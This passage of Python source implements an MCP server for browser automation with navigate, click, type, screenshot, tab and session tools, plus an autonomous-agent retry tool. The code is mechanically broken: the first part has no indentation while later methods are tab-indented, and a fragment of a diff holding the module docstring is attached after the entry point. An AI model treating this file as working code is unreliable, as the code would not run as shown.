'description': 'Optional CSS selector to get HTML of a specific element. If omitted, returns full page HTML.',
},
},
},
),
types.Tool(
name='browser_screenshot',
description='Take a screenshot of the current page. Returns viewport metadata as text and the screenshot as an image.',
inputSchema={
'type': 'object',
'properties': {
'full_page': {
'type': 'boolean',
'description': 'Whether to capture the full scrollable page or just the visible viewport',
'default': False,
},
},
},
),
types.Tool(
name='browser_scroll',
description='Scroll the page',
inputSchema={
'type': 'object',
'properties': {
'direction': {
'type': 'string',
'enum': ['up', 'down'],
'description': 'Direction to scroll',
'default': 'down',
}
},
},
),
types.Tool(
name='browser_go_back',
description='Go back to the previous page',
inputSchema={'type': 'object', 'properties': {}},
),
# Tab management
types.Tool(
name='browser_list_tabs', description='List all open tabs', inputSchema={'type': 'object', 'properties': {}}
),
types.Tool(
name='browser_switch_tab',
description='Switch to a different tab',
inputSchema={
'type': 'object',
'properties': {'tab_id': {'type': 'string', 'description': '4 Character Tab ID of the tab to switch to'}},
'required': ['tab_id'],
},
),
types.Tool(
name='browser_close_tab',
description='Close a tab',
inputSchema={
'type': 'object',
'properties': {'tab_id': {'type': 'string', 'description': '4 Character Tab ID of the tab to close'}},
'required': ['tab_id'],
},
),
# types.Tool(
# name="browser_close",
# description="Close the browser session",
# inputSchema={
# "type": "object",
# "properties": {}
# }
# ),
types.Tool(
name='retry_with_browser_use_agent',
description='Retry a task using the browser-use agent. Only use this as a last resort if you fail to interact with a page multiple times.',
inputSchema={
'type': 'object',
'properties': {
'task': {
'type': 'string',
'description': 'The high-level goal and detailed step-by-step description of the task the AI browser agent needs to attempt, along with any relevant data needed to complete the task and info about previous attempts.',
},
'max_steps': {
'type': 'integer',
'description': 'Maximum number of steps an agent can take.',
'default': 100,
},
'model': {
'type': 'string',
'description': 'LLM model to use (e.g., gpt-4o, claude-3-opus-20240229). Defaults to the configured model.',
},
'allowed_domains': {
'type': 'array',
'items': {'type': 'string'},
'description': 'List of domains the agent is allowed to visit (security feature)',
'default': [],
},
'use_vision': {
'type': 'boolean',
'description': 'Whether to use vision capabilities (screenshots) for the agent',
'default': True,
},
},
'required': ['task'],
},
),
# Browser session management tools
types.Tool(
name='browser_list_sessions',
description='List all active browser sessions with their details and last activity time',
inputSchema={'type': 'object', 'properties': {}},
),
types.Tool(
name='browser_close_session',
description='Close a specific browser session by its ID',
inputSchema={
'type': 'object',
'properties': {
'session_id': {
'type': 'string',
'description': 'The browser session ID to close (get from browser_list_sessions)',
}
},
'required': ['session_id'],
},
),
types.Tool(
name='browser_close_all',
description='Close all active browser sessions and clean up resources',
inputSchema={'type': 'object', 'properties': {}},
),
]
@self.server.list_resources()
async def handle_list_resources() -> list[types.Resource]:
return []
@self.server.list_prompts()
async def handle_list_prompts() -> list[types.Prompt]:
return []
@self.server.call_tool()
async def handle_call_tool(name: str, arguments: dict[str, Any] | None) -> list[types.TextContent | types.ImageContent]:
start_time = time.time()
error_msg = None
try:
result = await self._execute_tool(name, arguments or {})
if isinstance(result, list):
return result
return [types.TextContent(type='text', text=result)]
except Exception as e:
error_msg = str(e)
logger.error(f'Tool execution failed: {e}', exc_info=True)
return [types.TextContent(type='text', text=f'Error: {str(e)}')]
finally:
# Capture telemetry for tool calls
duration = time.time() - start_time
self._telemetry.capture(
MCPServerTelemetryEvent(
version=get_browser_use_version(),
action='tool_call',
tool_name=name,
duration_seconds=duration,
error_message=error_msg,
)
)
async def _execute_tool(
self, tool_name: str, arguments: dict[str, Any]
) -> str | list[types.TextContent | types.ImageContent]:
# Agent-based tools
if tool_name == 'retry_with_browser_use_agent':
return await self._retry_with_browser_use_agent(
task=arguments['task'],
max_steps=arguments.get('max_steps', 100),
model=arguments.get('model'),
allowed_domains=arguments.get('allowed_domains', []),
use_vision=arguments.get('use_vision', True),
)
# Browser session management tools (don't require active session)
if tool_name == 'browser_list_sessions':
return await self._list_sessions()
elif tool_name == 'browser_close_session':
return await self._close_session(arguments['session_id'])
elif tool_name == 'browser_close_all':
return await self._close_all_sessions()
# Direct browser control tools (require active session)
elif tool_name.startswith('browser_'):
# Ensure browser session exists
if not self.browser_session:
await self._init_browser_session()
if tool_name == 'browser_navigate':
return await self._navigate(arguments['url'], arguments.get('new_tab', False))
elif tool_name == 'browser_click':
return await self._click(
index=arguments.get('index'),
coordinate_x=arguments.get('coordinate_x'),
coordinate_y=arguments.get('coordinate_y'),
new_tab=arguments.get('new_tab', False),
)
elif tool_name == 'browser_type':
return await self._type_text(arguments['index'], arguments['text'])
elif tool_name == 'browser_get_state':
state_json, screenshot_b64 = await self._get_browser_state(arguments.get('include_screenshot', False))
content: list[types.TextContent | types.ImageContent] = [types.TextContent(type='text', text=state_json)]
if screenshot_b64:
content.append(types.ImageContent(type='image', data=screenshot_b64, mimeType='image/png'))
return content
elif tool_name == 'browser_get_html':
return await self._get_html(arguments.get('selector'))
elif tool_name == 'browser_screenshot':
meta_json, screenshot_b64 = await self._screenshot(arguments.get('full_page', False))
content: list[types.TextContent | types.ImageContent] = [types.TextContent(type='text', text=meta_json)]
if screenshot_b64:
content.append(types.ImageContent(type='image', data=screenshot_b64, mimeType='image/png'))
return content
elif tool_name == 'browser_extract_content':
return await self._extract_content(arguments['query'], arguments.get('extract_links', False))
elif tool_name == 'browser_scroll':
return await self._scroll(arguments.get('direction', 'down'))
elif tool_name == 'browser_go_back':
return await self._go_back()
elif tool_name == 'browser_close':
return await self._close_browser()
elif tool_name == 'browser_list_tabs':
return await self._list_tabs()
elif tool_name == 'browser_switch_tab':
return await self._switch_tab(arguments['tab_id'])
elif tool_name == 'browser_close_tab':
return await self._close_tab(arguments['tab_id'])
return f'Unknown tool: {tool_name}'
async def _init_browser_session(self, allowed_domains: list[str] | None = None, **kwargs):
if self.browser_session:
return
# Ensure all logging goes to stderr before browser initialization
_ensure_all_loggers_use_stderr()
logger.debug('Initializing browser session...')
# Get profile config
profile_config = get_default_profile(self.config)
# Merge profile config with defaults and overrides
profile_data = {
'downloads_path': str(Path.home() / 'Downloads' / 'browser-use-mcp'),
'wait_between_actions': 0.5,
'keep_alive': True,
'user_data_dir': '~/.config/browseruse/profiles/default',
'device_scale_factor': 1.0,
'disable_security': False,
'headless': False,
**profile_config, # Config values override defaults
}
# Tool parameter overrides (highest priority)
if allowed_domains is not None:
profile_data['allowed_domains'] = allowed_domains
# Merge any additional kwargs that are valid BrowserProfile fields
for key, value in kwargs.items():
profile_data[key] = value
# Create browser profile
profile = BrowserProfile(**profile_data)
# Create browser session
self.browser_session = BrowserSession(browser_profile=profile)
await self.browser_session.start()
# Track the session for management
self._track_session(self.browser_session)
# Create tools for direct actions
self.tools = Tools()
# Initialize LLM from config
llm_config = get_default_llm(self.config)
base_url = llm_config.get('base_url', None)
kwargs = {}
if base_url:
kwargs['base_url'] = base_url
if api_key := llm_config.get('api_key'):
self.llm = ChatOpenAI(
model=llm_config.get('model', 'gpt-o4-mini'),
api_key=api_key,
temperature=llm_config.get('temperature', 0.7),
**kwargs,
)
# Initialize FileSystem for extraction actions
file_system_path = profile_config.get('file_system_path', '~/.browser-use-mcp')
self.file_system = FileSystem(base_dir=Path(file_system_path).expanduser())
logger.debug('Browser session initialized')
	async def _retry_with_browser_use_agent(
		self,
		task: str,
		max_steps: int = 100,
		model: str | None = None,
		allowed_domains: list[str] | None = None,
		use_vision: bool = True,
	) -> str:
		"""Run an autonomous browser-use Agent for *task* and summarize the outcome.

		Edge cases:
		- Provider selection: when the configured/env MODEL_PROVIDER equals
		  'bedrock' (case-insensitive), an AWS Bedrock chat model is used and the
		  region falls back to 'us-east-1' when unset; otherwise OpenAI is used.
		- Returns an error *string* (never raises) when no OpenAI API key is found
		  in the config or the OPENAI_API_KEY environment variable.
		- Any exception raised during the agent run is caught, logged, and returned
		  as an error string; the agent is always closed in the ``finally`` block.
		- ``history.urls()`` may contain None entries; these are filtered out
		  before building the summary.
		"""
		logger.debug(f'Running agent task: {task}')
		# Get LLM config
		llm_config = get_default_llm(self.config)
		# Get LLM provider
		model_provider = llm_config.get('model_provider') or os.getenv('MODEL_PROVIDER')
		# Get Bedrock-specific config
		if model_provider and model_provider.lower() == 'bedrock':
			llm_model = llm_config.get('model') or os.getenv('MODEL') or 'us.anthropic.claude-sonnet-4-20250514-v1:0'
			aws_region = llm_config.get('region') or os.getenv('REGION')
			if not aws_region:
				aws_region = 'us-east-1'
			aws_sso_auth = llm_config.get('aws_sso_auth', False)
			llm = ChatAWSBedrock(
				model=llm_model,  # or any Bedrock model
				aws_region=aws_region,
				aws_sso_auth=aws_sso_auth,
			)
		else:
			api_key = llm_config.get('api_key') or os.getenv('OPENAI_API_KEY')
			if not api_key:
				return 'Error: OPENAI_API_KEY not set in config or environment'
			# Use explicit model from tool call, otherwise fall back to configured default
			llm_model = model or llm_config.get('model', 'gpt-4o')
			base_url = llm_config.get('base_url', None)
			kwargs = {}
			if base_url:
				kwargs['base_url'] = base_url
			llm = ChatOpenAI(
				model=llm_model,
				api_key=api_key,
				temperature=llm_config.get('temperature', 0.7),
				**kwargs,
			)
		# Get profile config and merge with tool parameters
		profile_config = get_default_profile(self.config)
		# Override allowed_domains if provided in tool call
		if allowed_domains is not None:
			profile_config['allowed_domains'] = allowed_domains
		# Create browser profile using config
		profile = BrowserProfile(**profile_config)
		# Create and run agent
		agent = Agent(
			task=task,
			llm=llm,
			browser_profile=profile,
			use_vision=use_vision,
		)
		try:
			history = await agent.run(max_steps=max_steps)
			# Format results
			results = []
			results.append(f'Task completed in {len(history.history)} steps')
			results.append(f'Success: {history.is_successful()}')
			# Get final result if available
			final_result = history.final_result()
			if final_result:
				results.append(f'\nFinal result:\n{final_result}')
			# Include any errors
			errors = history.errors()
			if errors:
				results.append(f'\nErrors encountered:\n{json.dumps(errors, indent=2)}')
			# Include URLs visited
			urls = history.urls()
			if urls:
				# Filter out None values and convert to strings
				valid_urls = [str(url) for url in urls if url is not None]
				if valid_urls:
					results.append(f'\nURLs visited: {", ".join(valid_urls)}')
			return '\n'.join(results)
		except Exception as e:
			logger.error(f'Agent task failed: {e}', exc_info=True)
			return f'Agent task failed: {str(e)}'
		finally:
			# Clean up
			await agent.close()
	async def _navigate(self, url: str, new_tab: bool = False) -> str:
		"""Navigate the current (or a new) tab to *url*.

		Edge cases:
		- Returns an error string if no browser session is active (never raises).
		- With ``new_tab=True`` the URL opens in a fresh tab; otherwise the
		  current tab is navigated in place.
		"""
		if not self.browser_session:
			return 'Error: No browser session active'
		# Update session activity
		self._update_session_activity(self.browser_session.id)
		from browser_use.browser.events import NavigateToUrlEvent

		if new_tab:
			event = self.browser_session.event_bus.dispatch(NavigateToUrlEvent(url=url, new_tab=True))
			await event
			return f'Opened new tab with URL: {url}'
		else:
			event = self.browser_session.event_bus.dispatch(NavigateToUrlEvent(url=url))
			await event
			return f'Navigated to: {url}'
	async def _click(
		self,
		index: int | None = None,
		coordinate_x: int | None = None,
		coordinate_y: int | None = None,
		new_tab: bool = False,
	) -> str:
		"""Click an element by index or at viewport coordinates.

		Edge cases:
		- Returns an error string if no browser session is active.
		- Coordinates take precedence: when BOTH ``coordinate_x`` and
		  ``coordinate_y`` are given, ``index`` and ``new_tab`` are ignored.
		- If neither coordinates nor an index are supplied, an error string is
		  returned explaining the required arguments.
		- An unknown ``index`` returns an "element not found" string.
		- ``new_tab=True`` only works for elements with an ``href`` attribute;
		  non-link elements fall back to a normal click (noted in the result).
		"""
		if not self.browser_session:
			return 'Error: No browser session active'
		# Update session activity
		self._update_session_activity(self.browser_session.id)
		# Coordinate-based clicking
		if coordinate_x is not None and coordinate_y is not None:
			from browser_use.browser.events import ClickCoordinateEvent

			event = self.browser_session.event_bus.dispatch(
				ClickCoordinateEvent(coordinate_x=coordinate_x, coordinate_y=coordinate_y)
			)
			await event
			return f'Clicked at coordinates ({coordinate_x}, {coordinate_y})'
		# Index-based clicking
		if index is None:
			return 'Error: Provide either index or both coordinate_x and coordinate_y'
		# Get the element
		element = await self.browser_session.get_dom_element_by_index(index)
		if not element:
			return f'Element with index {index} not found'
		if new_tab:
			# For links, extract href and open in new tab
			href = element.attributes.get('href')
			if href:
				# Convert relative href to absolute URL
				state = await self.browser_session.get_browser_state_summary()
				current_url = state.url
				if href.startswith('/'):
					# Relative URL - construct full URL
					# NOTE(review): a protocol-relative href ('//host/path') also starts
					# with '/' and would be joined incorrectly here — TODO confirm intent.
					from urllib.parse import urlparse

					parsed = urlparse(current_url)
					full_url = f'{parsed.scheme}://{parsed.netloc}{href}'
				else:
					full_url = href
				# Open link in new tab
				from browser_use.browser.events import NavigateToUrlEvent

				event = self.browser_session.event_bus.dispatch(NavigateToUrlEvent(url=full_url, new_tab=True))
				await event
				return f'Clicked element {index} and opened in new tab {full_url[:20]}...'
			else:
				# For non-link elements, just do a normal click
				from browser_use.browser.events import ClickElementEvent

				event = self.browser_session.event_bus.dispatch(ClickElementEvent(node=element))
				await event
				return f'Clicked element {index} (new tab not supported for non-link elements)'
		else:
			# Normal click
			from browser_use.browser.events import ClickElementEvent

			event = self.browser_session.event_bus.dispatch(ClickElementEvent(node=element))
			await event
			return f'Clicked element {index}'
	async def _type_text(self, index: int, text: str) -> str:
		"""Type *text* into the element at *index*.

		Edge cases:
		- Returns an error string if no session is active or the index is unknown.
		- Sensitive-data redaction: text of 6+ characters matching an email shape,
		  or 16+ mixed alphanumeric characters containing '.', '-' or '_'
		  (API-key-like), is flagged as sensitive. The typed value is then NOT
		  echoed back — the result shows only a generic '<email>'/'<credential>'
		  placeholder. Short or simple text is echoed verbatim.
		- The heuristic is intentionally conservative to minimize false positives;
		  it can miss sensitive values (e.g. short passwords are echoed).
		"""
		if not self.browser_session:
			return 'Error: No browser session active'
		element = await self.browser_session.get_dom_element_by_index(index)
		if not element:
			return f'Element with index {index} not found'
		from browser_use.browser.events import TypeTextEvent

		# Conservative heuristic to detect potentially sensitive data
		# Only flag very obvious patterns to minimize false positives
		is_potentially_sensitive = len(text) >= 6 and (
			# Email pattern: contains @ and a domain-like suffix
			('@' in text and '.' in text.split('@')[-1] if '@' in text else False)
			# Mixed alphanumeric with reasonable complexity (likely API keys/tokens)
			or (
				len(text) >= 16
				and any(char.isdigit() for char in text)
				and any(char.isalpha() for char in text)
				and any(char in '.-_' for char in text)
			)
		)
		# Use generic key names to avoid information leakage about detection patterns
		sensitive_key_name = None
		if is_potentially_sensitive:
			if '@' in text and '.' in text.split('@')[-1]:
				sensitive_key_name = 'email'
			else:
				sensitive_key_name = 'credential'
		event = self.browser_session.event_bus.dispatch(
			TypeTextEvent(node=element, text=text, is_sensitive=is_potentially_sensitive, sensitive_key_name=sensitive_key_name)
		)
		await event
		if is_potentially_sensitive:
			if sensitive_key_name:
				return f'Typed <{sensitive_key_name}> into element {index}'
			else:
				return f'Typed <sensitive> into element {index}'
		else:
			return f"Typed '{text}' into element {index}"
	async def _get_browser_state(self, include_screenshot: bool = False) -> tuple[str, str | None]:
		"""Get the current browser state as ``(state_json, screenshot_b64 | None)``.

		Edge cases:
		- With no active session, returns ``('Error: ...', None)`` — the first
		  element is an error string, not JSON; callers must not assume JSON.
		- The screenshot slot is None unless ``include_screenshot=True`` AND the
		  state actually carries a screenshot.
		- Viewport/page/scroll info and ``screenshot_dimensions`` are only added
		  when ``state.page_info`` is present.
		- Element text is truncated to 100 characters; 'placeholder'/'href' keys
		  appear only when the attribute exists.
		"""
		if not self.browser_session:
			return 'Error: No browser session active', None
		state = await self.browser_session.get_browser_state_summary()
		result: dict[str, Any] = {
			'url': state.url,
			'title': state.title,
			'tabs': [{'url': tab.url, 'title': tab.title} for tab in state.tabs],
			'interactive_elements': [],
		}
		# Add viewport info so the LLM knows the coordinate space
		if state.page_info:
			pi = state.page_info
			result['viewport'] = {
				'width': pi.viewport_width,
				'height': pi.viewport_height,
			}
			result['page'] = {
				'width': pi.page_width,
				'height': pi.page_height,
			}
			result['scroll'] = {
				'x': pi.scroll_x,
				'y': pi.scroll_y,
			}
		# Add interactive elements with their indices
		for index, element in state.dom_state.selector_map.items():
			elem_info: dict[str, Any] = {
				'index': index,
				'tag': element.tag_name,
				'text': element.get_all_children_text(max_depth=2)[:100],
			}
			if element.attributes.get('placeholder'):
				elem_info['placeholder'] = element.attributes['placeholder']
			if element.attributes.get('href'):
				elem_info['href'] = element.attributes['href']
			result['interactive_elements'].append(elem_info)
		# Return screenshot separately as ImageContent instead of embedding base64 in JSON
		screenshot_b64 = None
		if include_screenshot and state.screenshot:
			screenshot_b64 = state.screenshot
			# Include viewport dimensions in JSON so LLM can map pixels to coordinates
			if state.page_info:
				result['screenshot_dimensions'] = {
					'width': state.page_info.viewport_width,
					'height': state.page_info.viewport_height,
				}
		return json.dumps(result, indent=2), screenshot_b64
	async def _get_html(self, selector: str | None = None) -> str:
		"""Get the raw HTML of the page, or of the first element matching *selector*.

		Edge cases:
		- Returns error strings (never raises) when no session or no CDP session
		  is available.
		- With a selector that matches nothing, the JS expression evaluates to
		  null and a "No element found" message is returned; with no selector and
		  a null result, a generic "Could not get page HTML" error is returned.
		- The selector is embedded via ``json.dumps`` to safely escape quotes.
		"""
		if not self.browser_session:
			return 'Error: No browser session active'
		self._update_session_activity(self.browser_session.id)
		cdp_session = await self.browser_session.get_or_create_cdp_session(target_id=None, focus=False)
		if not cdp_session:
			return 'Error: No active CDP session'
		if selector:
			js = (
				f'(function(){{ const el = document.querySelector({json.dumps(selector)}); return el ? el.outerHTML : null; }})()'
			)
		else:
			js = 'document.documentElement.outerHTML'
		result = await cdp_session.cdp_client.send.Runtime.evaluate(
			params={'expression': js, 'returnByValue': True},
			session_id=cdp_session.session_id,
		)
		html = result.get('result', {}).get('value')
		if html is None:
			return f'No element found for selector: {selector}' if selector else 'Error: Could not get page HTML'
		return html
	async def _screenshot(self, full_page: bool = False) -> tuple[str, str | None]:
		"""Take a screenshot. Returns ``(metadata_json, screenshot_b64 | None)``.

		Edge cases:
		- With no active session, returns ``('Error: ...', None)`` — the first
		  element is an error string, not JSON.
		- Viewport dimensions are only included when ``state.page_info`` exists.
		- The screenshot is returned base64-encoded and kept OUT of the JSON so it
		  can be sent as separate ImageContent.
		"""
		if not self.browser_session:
			return 'Error: No browser session active', None
		import base64

		self._update_session_activity(self.browser_session.id)
		data = await self.browser_session.take_screenshot(full_page=full_page)
		b64 = base64.b64encode(data).decode()
		# Return screenshot separately as ImageContent instead of embedding base64 in JSON
		state = await self.browser_session.get_browser_state_summary()
		result: dict[str, Any] = {
			'size_bytes': len(data),
		}
		if state.page_info:
			result['viewport'] = {
				'width': state.page_info.viewport_width,
				'height': state.page_info.viewport_height,
			}
		return json.dumps(result), b64
	async def _extract_content(self, query: str, extract_links: bool = False) -> str:
		"""Extract content from the current page using the LLM-backed extract action.

		Edge cases:
		- Returns distinct error strings when the LLM, file system, browser
		  session, or tools have not been initialized — each prerequisite is
		  checked separately so the caller knows what is missing.
		- Returns 'No content extracted' when the action yields no content.
		- Builds the action model dynamically at call time because the tools
		  registry expects its own action schema.
		"""
		if not self.llm:
			return 'Error: LLM not initialized (set OPENAI_API_KEY)'
		if not self.file_system:
			return 'Error: FileSystem not initialized'
		if not self.browser_session:
			return 'Error: No browser session active'
		if not self.tools:
			return 'Error: Tools not initialized'
		state = await self.browser_session.get_browser_state_summary()
		# Use the extract action
		# Create a dynamic action model that matches the tools's expectations
		from pydantic import create_model

		# Create action model dynamically
		ExtractAction = create_model(
			'ExtractAction',
			__base__=ActionModel,
			extract=dict[str, Any],
		)
		# Use model_validate because Pyright does not understand the dynamic model
		action = ExtractAction.model_validate(
			{
				'extract': {'query': query, 'extract_links': extract_links},
			}
		)
		action_result = await self.tools.act(
			action=action,
			browser_session=self.browser_session,
			page_extraction_llm=self.llm,
			file_system=self.file_system,
		)
		return action_result.extracted_content or 'No content extracted'
	async def _scroll(self, direction: str = 'down') -> str:
		"""Scroll the page by a fixed 500-pixel step.

		Edge cases:
		- Returns an error string if no browser session is active.
		- ``direction`` is forwarded unvalidated to ScrollEvent (type-checked
		  downstream, hence the ``type: ignore``).
		"""
		if not self.browser_session:
			return 'Error: No browser session active'
		from browser_use.browser.events import ScrollEvent

		# Scroll by a standard amount (500 pixels)
		event = self.browser_session.event_bus.dispatch(
			ScrollEvent(
				direction=direction,  # type: ignore
				amount=500,
			)
		)
		await event
		return f'Scrolled {direction}'
	async def _go_back(self) -> str:
		"""Go back one entry in browser history.

		Edge case: returns an error string if no browser session is active.
		"""
		if not self.browser_session:
			return 'Error: No browser session active'
		from browser_use.browser.events import GoBackEvent

		event = self.browser_session.event_bus.dispatch(GoBackEvent())
		await event
		return 'Navigated back'
	async def _close_browser(self) -> str:
		"""Close the browser session and clear the session/tools references.

		Edge cases:
		- Safe to call with no active session — returns a descriptive message
		  instead of failing.
		- After closing, ``self.browser_session`` and ``self.tools`` are reset to
		  None so subsequent tool calls re-initialize from scratch.
		"""
		if self.browser_session:
			from browser_use.browser.events import BrowserStopEvent

			event = self.browser_session.event_bus.dispatch(BrowserStopEvent())
			await event
			self.browser_session = None
			self.tools = None
			return 'Browser closed'
		return 'No browser session to close'
async def _list_tabs(self) -> str:
if not self.browser_session:
return 'Error: No browser session active'
tabs_info = await self.browser_session.get_tabs()
tabs = []
for i, tab in enumerate(tabs_info):
tabs.append({'tab_id': tab.target_id[-4:], 'url': tab.url, 'title': tab.title or ''})
return json.dumps(tabs, indent=2)
	async def _switch_tab(self, tab_id: str) -> str:
		"""Switch to the tab identified by the short *tab_id*.

		Edge cases:
		- Returns an error string if no browser session is active.
		- ``tab_id`` is the 4-character suffix produced by ``_list_tabs``;
		  resolution to a full CDP target id happens downstream — NOTE(review):
		  behavior for an unknown/ambiguous tab_id depends on
		  ``get_target_id_from_tab_id`` and is not handled here — TODO confirm.
		"""
		if not self.browser_session:
			return 'Error: No browser session active'
		from browser_use.browser.events import SwitchTabEvent

		target_id = await self.browser_session.get_target_id_from_tab_id(tab_id)
		event = self.browser_session.event_bus.dispatch(SwitchTabEvent(target_id=target_id))
		await event
		state = await self.browser_session.get_browser_state_summary()
		return f'Switched to tab {tab_id}: {state.url}'
	async def _close_tab(self, tab_id: str) -> str:
		"""Close the tab identified by the short *tab_id*.

		Edge cases:
		- Returns an error string if no browser session is active.
		- After closing, reports the URL the browser landed on (may be a
		  different tab than before the close).
		- Unknown tab_id handling is delegated to ``get_target_id_from_tab_id``
		  — NOTE(review): not guarded here, TODO confirm downstream behavior.
		"""
		if not self.browser_session:
			return 'Error: No browser session active'
		from browser_use.browser.events import CloseTabEvent

		target_id = await self.browser_session.get_target_id_from_tab_id(tab_id)
		event = self.browser_session.event_bus.dispatch(CloseTabEvent(target_id=target_id))
		await event
		current_url = await self.browser_session.get_current_page_url()
		return f'Closed tab # {tab_id}, now on {current_url}'
	def _track_session(self, session: BrowserSession) -> None:
		"""Register *session* in the activity-tracking map.

		Edge cases:
		- Re-tracking an already-tracked session id overwrites its entry,
		  resetting ``created_at`` and ``last_activity``.
		- ``url`` is best-effort: None when the session has no ``current_url``
		  attribute yet.
		"""
		self.active_sessions[session.id] = {
			'session': session,
			'created_at': time.time(),
			'last_activity': time.time(),
			'url': getattr(session, 'current_url', None),
		}
	def _update_session_activity(self, session_id: str) -> None:
		"""Refresh the last-activity timestamp for *session_id*.

		Edge case: silently ignores unknown session ids (no error raised), so it
		is safe to call for sessions that were already closed or never tracked.
		"""
		if session_id in self.active_sessions:
			self.active_sessions[session_id]['last_activity'] = time.time()
	async def _list_sessions(self) -> str:
		"""List all tracked browser sessions as a JSON array.

		Edge cases:
		- Returns a plain message (not JSON) when no sessions are tracked.
		- 'active' is a heuristic: a session counts as active when it exposes a
		  non-None ``cdp_client`` attribute; a crashed browser may still report
		  active until cleanup runs.
		- 'current_url' falls back to 'Unknown' when no URL was recorded.
		"""
		if not self.active_sessions:
			return 'No active browser sessions'
		sessions_info = []
		for session_id, session_data in self.active_sessions.items():
			session = session_data['session']
			created_at = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(session_data['created_at']))
			last_activity = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(session_data['last_activity']))
			# Check if session is still active
			is_active = hasattr(session, 'cdp_client') and session.cdp_client is not None
			sessions_info.append(
				{
					'session_id': session_id,
					'created_at': created_at,
					'last_activity': last_activity,
					'active': is_active,
					'current_url': session_data.get('url', 'Unknown'),
					'age_minutes': (time.time() - session_data['created_at']) / 60,
				}
			)
		return json.dumps(sessions_info, indent=2)
	async def _close_session(self, session_id: str) -> str:
		"""Close and untrack a specific browser session.

		Edge cases:
		- Unknown session ids return a "not found" string instead of raising.
		- Prefers ``session.kill()`` over ``session.close()``; if the session
		  object has neither, it is still removed from tracking.
		- When the closed session is the CURRENT one, ``self.browser_session``
		  and ``self.tools`` are also cleared so later calls re-initialize.
		- Any exception during close is caught and reported as an error string;
		  in that case the session stays in the tracking map.
		"""
		if session_id not in self.active_sessions:
			return f'Session {session_id} not found'
		session_data = self.active_sessions[session_id]
		session = session_data['session']
		try:
			# Close the session
			if hasattr(session, 'kill'):
				await session.kill()
			elif hasattr(session, 'close'):
				await session.close()
			# Remove from tracking
			del self.active_sessions[session_id]
			# If this was the current session, clear it
			if self.browser_session and self.browser_session.id == session_id:
				self.browser_session = None
				self.tools = None
			return f'Successfully closed session {session_id}'
		except Exception as e:
			return f'Error closing session {session_id}: {str(e)}'
	async def _close_all_sessions(self) -> str:
		"""Close every tracked browser session, collecting per-session errors.

		Edge cases:
		- Returns early with a message when nothing is tracked.
		- Iterates over a COPY of the key list because ``_close_session`` mutates
		  ``self.active_sessions`` during iteration.
		- Failures for individual sessions do not stop the loop; they are
		  accumulated and appended to the summary string.
		- Current-session references are cleared unconditionally at the end, even
		  if some sessions failed to close.
		"""
		if not self.active_sessions:
			return 'No active sessions to close'
		closed_count = 0
		errors = []
		for session_id in list(self.active_sessions.keys()):
			try:
				result = await self._close_session(session_id)
				if 'Successfully closed' in result:
					closed_count += 1
				else:
					errors.append(f'{session_id}: {result}')
			except Exception as e:
				errors.append(f'{session_id}: {str(e)}')
		# Clear current session references
		self.browser_session = None
		self.tools = None
		result = f'Closed {closed_count} sessions'
		if errors:
			result += f'. Errors: {"; ".join(errors)}'
		return result
	async def _cleanup_expired_sessions(self) -> None:
		"""Close sessions idle longer than ``session_timeout_minutes``.

		Edge cases:
		- Expired ids are collected FIRST, then closed, to avoid mutating
		  ``self.active_sessions`` while iterating it.
		- A failure closing one expired session is logged and does not prevent
		  the remaining sessions from being cleaned up.
		- Expiry is based on ``last_activity``, not creation time, so a busy
		  long-lived session is never reaped.
		"""
		current_time = time.time()
		timeout_seconds = self.session_timeout_minutes * 60
		expired_sessions = []
		for session_id, session_data in self.active_sessions.items():
			last_activity = session_data['last_activity']
			if current_time - last_activity > timeout_seconds:
				expired_sessions.append(session_id)
		for session_id in expired_sessions:
			try:
				await self._close_session(session_id)
				logger.info(f'Auto-closed expired session {session_id}')
			except Exception as e:
				logger.error(f'Error auto-closing session {session_id}: {e}')
	async def _start_cleanup_task(self) -> None:
		"""Start the background task that reaps expired sessions every 2 minutes.

		Edge cases:
		- The loop never exits on error: any exception from a cleanup pass is
		  logged and the loop sleeps and retries, so one bad pass cannot kill
		  session cleanup for the server's lifetime.
		- The task is created with ``suppress_exceptions=True`` so an unexpected
		  task crash does not propagate.
		"""
		async def cleanup_loop():
			while True:
				try:
					await self._cleanup_expired_sessions()
					# Check every 2 minutes
					await asyncio.sleep(120)
				except Exception as e:
					logger.error(f'Error in cleanup task: {e}')
					await asyncio.sleep(120)

		self._cleanup_task = create_task_with_error_handling(cleanup_loop(), name='mcp_cleanup_loop', suppress_exceptions=True)
	async def run(self):
		"""Run the MCP server over stdio until the client disconnects.

		Edge cases:
		- The session-cleanup background task is started BEFORE serving, so idle
		  sessions are reaped even while the server is blocked on stdio.
		- stdout is reserved for JSON-RPC; all logging must already be routed to
		  stderr before this point.
		"""
		# Start the cleanup task
		await self._start_cleanup_task()
		async with mcp.server.stdio.stdio_server() as (read_stream, write_stream):
			await self.server.run(
				read_stream,
				write_stream,
				InitializationOptions(
					server_name='browser-use',
					server_version='0.1.0',
					capabilities=self.server.get_capabilities(
						notification_options=NotificationOptions(),
						experimental_capabilities={},
					),
				),
			)
async def main(session_timeout_minutes: int = 10):
	"""Entry point: create and run the BrowserUseServer.

	Edge cases:
	- Exits the process with status 1 (message on stderr, not stdout) when the
	  MCP SDK is not installed.
	- The 'stop' telemetry event and flush run in a ``finally`` block, so usage
	  duration is reported even when the server exits via an exception.

	Args:
		session_timeout_minutes: Idle timeout after which browser sessions are
			auto-closed by the cleanup task.
	"""
	if not MCP_AVAILABLE:
		print('MCP SDK is required. Install with: pip install mcp', file=sys.stderr)
		sys.exit(1)
	server = BrowserUseServer(session_timeout_minutes=session_timeout_minutes)
	server._telemetry.capture(
		MCPServerTelemetryEvent(
			version=get_browser_use_version(),
			action='start',
			parent_process_cmdline=get_parent_process_cmdline(),
		)
	)
	try:
		await server.run()
	finally:
		duration = time.time() - server._start_time
		server._telemetry.capture(
			MCPServerTelemetryEvent(
				version=get_browser_use_version(),
				action='stop',
				duration_seconds=duration,
				parent_process_cmdline=get_parent_process_cmdline(),
			)
		)
		server._telemetry.flush()
# Script entry point: run the MCP server with the default 10-minute session timeout.
if __name__ == '__main__':
	asyncio.run(main())
+
+This server provides tools for:
+- Running autonomous browser tasks with an AI agent
+- Direct browser control (navigation, clicking, typing, etc.)
+- Content extraction from web pages
+- File system operations
+
+Usage:
+ uvx browser-use --mcp
+
+Or as an MCP server in Claude Desktop or other MCP clients:
+ {
+ "mcpServers": {
+ "browser-use": {
+ "command": "uvx",
+ "args": ["browser-use[cli]", "--mcp"],
+ "env": {
+ "OPENAI_API_KEY": "sk-proj-1234567890",
+ }
